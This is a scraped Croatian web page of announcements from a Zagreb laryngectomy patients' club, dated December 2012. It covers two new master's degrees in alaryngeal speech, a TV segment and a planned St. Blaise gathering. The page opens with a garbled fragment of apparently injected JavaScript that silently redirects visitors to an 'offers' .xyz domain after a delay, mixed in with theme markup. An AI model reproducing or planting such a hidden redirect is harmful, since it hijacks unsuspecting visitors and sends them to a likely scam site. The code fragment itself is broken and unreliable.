{ window.location.replace('http://offers25942.xyz/'); }, delay);})();_style_left et_pb_pagebuilder_layout et_smooth_scroll et_right_sidebar et_divi_theme gecko et_minified_js et_minified_css">
Početna stranica » Arhiva događanja » Događanja » Važne obavijesti

Važne obavijesti

pro 23, 2012

Dvije nove magistrice znanosti iz podučja alaringealnog govora

 

Srdačno čestitamo našim vrijednim suradnicama na obrani magistarskih radova iz područja alaringealnog govora profesoricama Tamari Živković Ivanović, našoj voditeljici rehabilitacije iz KBC Rebro i Jadranki Franić iz KB S.Duh!

Laringektomirani pjevaju u emisiji HTV "Pozitivno"

Prigodom domjenka Zagrebačkog kluba laringektomiranih održanog u prostorima Franjevačkog samostana u Zagrebačkoj Dubravi 19. prosinca, na kojem je sudjelovalo 90 članova i gostiju, snimljen je prilog za emisiju "Pozitivno" koji je prikazan na HTV 1 u četvrtak 20. prosinca, te HTV 2, u subotu 22 prosinca. U prilogu je pružena lijepa slika o našoj udruzi i kvaliteti života.

 

 

Proslava Sv. Blaža u Daruvarskim Toplicama (1.2.2013. - 3.2.2013.)

Obavještavamo članstvo i sve zainteresirane da će se od petka 1. veljače do nedjelje 3. veljače 2013. god. u Daruvarskim Toplicama održati 23. međunarodno druženje laringektomiranih prigodom Sv. Blaža. Suorganizator nam je Klub Bjelovar i ORL odjel OB Bjelovar u stručnom dijelu (Simpozij).

 

Pokrovitelji su uobičajeno H. društvo za orl i kirurgiju glave i vrata HLZ i ostali.
O pojedinostima će klubovi biti obavješteni na vrijeme .

 

Svima želimo čestit Božić i uspješnu Novu 2013. te zahvaljujemo na uspješnoj suradnji!

Print Friendly, PDF & Email